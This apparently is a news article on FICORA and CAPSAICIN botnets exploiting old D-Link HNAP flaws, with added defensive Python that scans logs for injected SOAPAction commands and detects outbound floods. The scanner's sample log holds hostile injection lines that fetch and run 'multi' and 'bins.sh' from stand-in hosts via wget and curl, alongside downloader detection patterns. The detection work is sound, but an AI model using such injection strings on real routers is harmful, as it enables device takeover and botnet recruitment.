The D-Link router exploits fueling FICORA and Kaiten botnet attacks have raised serious cybersecurity concerns globally.
These attacks leverage outdated vulnerabilities in D-Link routers to rope devices into powerful botnets, wreaking havoc through distributed denial-of-service (DDoS) attacks and malicious payload deployments.
Despite some of these vulnerabilities being over a decade old, attackers continue to exploit them, targeting users and businesses that fail to update their devices. If you’re still using an older D-Link router, it’s time to take immediate action.
Key Takeaway: D-Link Router Exploits Fuel FICORA and Kaiten Botnet Attacks
- Unpatched D-Link routers are being targeted by FICORA and Kaiten botnets, causing global cybersecurity threats.
Understanding the D-Link Router Exploits
The latest warning from cybersecurity researchers highlights a disturbing trend of attackers exploiting long-known vulnerabilities in D-Link routers.
These exploits are powering two distinct botnets: a Mirai variant named FICORA and a Kaiten variant dubbed CAPSAICIN.
The Vulnerabilities in Focus
The weaknesses being exploited include:
| CVE Number | Year Disclosed | Description |
|---|---|---|
| CVE-2015-2051 | 2015 | HNAP interface command execution flaw |
| CVE-2019-10891 | 2019 | Remote code execution vulnerability |
| CVE-2022-37056 | 2022 | Arbitrary command execution |
| CVE-2024-33112 | 2024 | Critical flaw in device configuration |
These vulnerabilities allow attackers to take control of devices via the Home Network Administration Protocol (HNAP) interface by sending malicious commands through the GetDeviceSettings action.
How FICORA and Kaiten Botnets Operate
FICORA Botnet
The FICORA botnet attacks systems by downloading a shell script (multi) from a remote server. This script then deploys payloads tailored for various Linux architectures. FICORA’s key features include:
- Brute-Force Attacks: Uses hard-coded username and password combinations.
- DDoS Attacks: Employs UDP, TCP, and DNS protocols to flood targets.
CAPSAICIN Botnet
CAPSAICIN operates similarly, downloading its payload via the bins.sh script. Once installed, it communicates with a command-and-control (C2) server to execute operations such as:
- Flooding Attacks: Executes DDoS using methods like TCP and UDP flooding.
- Shell Command Execution: Runs shell commands remotely.
- System Manipulation: Can kill competing botnet processes to dominate infected devices.
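To make the exploitation pattern described above usable on the detection side, here is an added example (not code from the original article, from D-Link or from Fortinet) that scans HTTP access log lines for HNAP GetDeviceSettings requests whose SOAPAction value carries shell metacharacters or invokes a downloader fetching the multi or bins.sh scripts named above. The log layout, the IP addresses and the sample lines are constructed; the placement of an injected command after the action name inside the SOAPAction header is an assumption based on how HNAP encodes its actions, not a detail stated in the article.

```python
import re
from dataclasses import dataclass

# Constructed sample access log (not real traffic). Hypothetical layout:
#   <client_ip> <method> <path> <status> "<SOAPAction header value>"
# HNAP is SOAP-based and names the requested action in the SOAPAction
# header; the assumption here is that an injected command is appended
# after the action name, which is what the detector looks for.
SAMPLE_LOG = """\
192.0.2.10 POST /HNAP1/ 200 "http://purenetworks.com/HNAP1/GetDeviceSettings"
198.51.100.7 POST /HNAP1/ 200 "http://purenetworks.com/HNAP1/GetDeviceSettings/`wget http://203.0.113.5/multi -O /tmp/multi`"
192.0.2.10 GET /index.html 200 "-"
198.51.100.8 POST /HNAP1/ 200 "http://purenetworks.com/HNAP1/GetDeviceSettings/; curl http://203.0.113.9/bins.sh | sh"
203.0.113.77 POST /HNAP1/ 401 "http://purenetworks.com/HNAP1/Login"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) "(?P<soap>[^"]*)"$'
)
ACTION_RE = re.compile(r'/HNAP1/(?P<action>[A-Za-z]+)(?P<tail>.*)$')
SHELL_METACHARS = ('`', ';', '|', '&', '$(')
DOWNLOADERS = ('wget', 'curl', 'tftp', 'ftpget')   # common stage-1 fetchers on embedded Linux
DROPPER_NAMES = re.compile(r'\b(multi|bins\.sh)\b')  # the two script names from the article


@dataclass(frozen=True)
class Finding:
    client: str
    action: str
    reasons: tuple


def inspect_soapaction(soap):
    """Return (action, reasons). An empty reasons tuple means the value looks benign."""
    m = ACTION_RE.search(soap)
    if not m:
        return None, ()
    action, tail = m.group('action'), m.group('tail')
    reasons = []
    if any(c in tail for c in SHELL_METACHARS):
        reasons.append('shell metacharacters after the action name')
    if any(tool in tail for tool in DOWNLOADERS):
        reasons.append('stage-1 downloader invoked')
    if DROPPER_NAMES.search(tail):
        reasons.append('known dropper script name')
    return action, tuple(reasons)


def scan_log(text):
    """Return a list with one Finding per HNAP request whose SOAPAction value looks injected."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m.group('path').startswith('/HNAP1'):
            continue
        action, reasons = inspect_soapaction(m.group('soap'))
        if reasons:
            findings.append(Finding(m.group('client'), action, reasons))
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f'{f.client}: {f.action}: ' + '; '.join(f.reasons))
```

The first rule (metacharacters after a legitimate action name) is the one that survives renamed droppers and new hosting servers; the downloader and script-name rules are cheap corroboration that raise confidence and help triage. A plain GetDeviceSettings call with nothing appended, which a legitimate management client sends, produces no finding.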
Real-Life Impact: A Global Threat
According to Fortinet FortiGuard Labs, FICORA botnet attacks are widespread, while CAPSAICIN has mainly targeted East Asia, with intense activity in Japan and Taiwan during October 2024.
This attack pattern is reminiscent of the 2016 Mirai botnet attack, which crippled major websites and services globally by leveraging IoT devices with weak security.
What This Means for the Future
The resurgence of these old vulnerabilities signals a need for better cybersecurity awareness and routine device updates. As botnets evolve, attackers will continue exploiting IoT devices with poor defenses, amplifying risks for unpatched systems.
Organizations and individuals must:
- Regularly patch their devices.
- Conduct network security audits.
- Replace unsupported hardware.
About D-Link
D-Link Corporation is a leading provider of networking equipment, including routers, switches, and security cameras. The company offers solutions for both businesses and consumers.
For more information, visit D-Link’s official website.
Rounding Up
The D-Link router exploits fueling FICORA and Kaiten botnet attacks demonstrate how outdated devices can create massive vulnerabilities.
Regular updates and proactive cybersecurity practices are critical to mitigating these risks. Don’t wait until it’s too late: protect your network today.
FAQs
What are FICORA and Kaiten botnets?
- FICORA and Kaiten are botnets that use exploited D-Link routers to conduct DDoS attacks and execute malicious commands.
Which vulnerabilities are being exploited?
- The vulnerabilities include CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.
How can I protect my router from these attacks?
- Update your router’s firmware, disable HNAP if possible, and replace outdated devices.
What is the impact of these botnets?
- They cause service disruptions through DDoS attacks and compromise device security globally.
Are there any signs my router is infected?
- Unusual network activity, slow performance, or unknown connections could indicate infection.
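The signs listed above are easier to act on with a concrete check. The following added example (not from the article) parses constructed flow records exported from a home gateway and flags the two signs that are measurable: a sustained outbound packet rate from the router toward a single destination, the shape of the UDP and TCP floods these botnets launch, and destinations outside the router's expected peer set. The record layout, the addresses, the expected-peer set and the packet-rate threshold are all assumptions.

```python
# Constructed flow records exported from a home gateway (not real data).
# Hypothetical layout: "<epoch_seconds> <src> <dst> <proto> <dport> <packets>"
# 192.168.1.1 is the router itself; 203.0.113.20 is its configured resolver.
SAMPLE_FLOWS = """\
1700000000 192.168.1.1 203.0.113.20 udp 53 3
1700000001 192.168.1.1 203.0.113.20 udp 53 2
1700000002 192.168.1.1 198.51.100.40 udp 80 4200
1700000003 192.168.1.1 198.51.100.40 udp 80 4600
1700000004 192.168.1.1 198.51.100.40 udp 80 4900
1700000005 192.168.1.1 198.51.100.40 tcp 443 3
1700000005 192.168.1.1 203.0.113.20 udp 53 1
"""


def parse_flows(text):
    """Turn the whitespace-separated records into dicts with typed fields."""
    flows = []
    for line in text.splitlines():
        ts, src, dst, proto, dport, packets = line.split()
        flows.append({'ts': int(ts), 'src': src, 'dst': dst, 'proto': proto,
                      'dport': int(dport), 'packets': int(packets)})
    return flows


def find_floods(flows, pps_threshold=1000):
    """Flag (src, dst, proto) tuples whose average packet rate reaches the threshold.

    A router that normally sends a handful of DNS packets per second but is
    suddenly pushing thousands of UDP packets at one host is participating in
    a flood, whatever the payload looks like.
    """
    agg = {}
    for f in flows:
        key = (f['src'], f['dst'], f['proto'])
        a = agg.setdefault(key, {'packets': 0, 'first': f['ts'], 'last': f['ts']})
        a['packets'] += f['packets']
        a['first'] = min(a['first'], f['ts'])
        a['last'] = max(a['last'], f['ts'])
    alerts = []
    for (src, dst, proto), a in agg.items():
        span = max(a['last'] - a['first'], 1)   # at least one second, avoids divide-by-zero
        rate = a['packets'] / span
        if rate >= pps_threshold:
            alerts.append({'src': src, 'dst': dst, 'proto': proto, 'pps': rate})
    return alerts


def unexpected_peers(flows, expected):
    """Destinations the router talked to that are not in its expected peer set."""
    return sorted({f['dst'] for f in flows if f['dst'] not in expected})


if __name__ == '__main__':
    flows = parse_flows(SAMPLE_FLOWS)
    for alert in find_floods(flows):
        print(f"flood: {alert['src']} -> {alert['dst']} {alert['proto']} at {alert['pps']:.0f} pps")
    print('unexpected peers:', unexpected_peers(flows, {'203.0.113.20'}))
```

The threshold is deliberately a parameter: a gateway serving a busy household will have a higher legitimate baseline than the one in this sample, so measure normal traffic for a day before choosing it. The peer check is the simpler of the two and catches the C2 beaconing described above even when no flood is under way, provided the router's legitimate peers (resolver, NTP, vendor update server) are known.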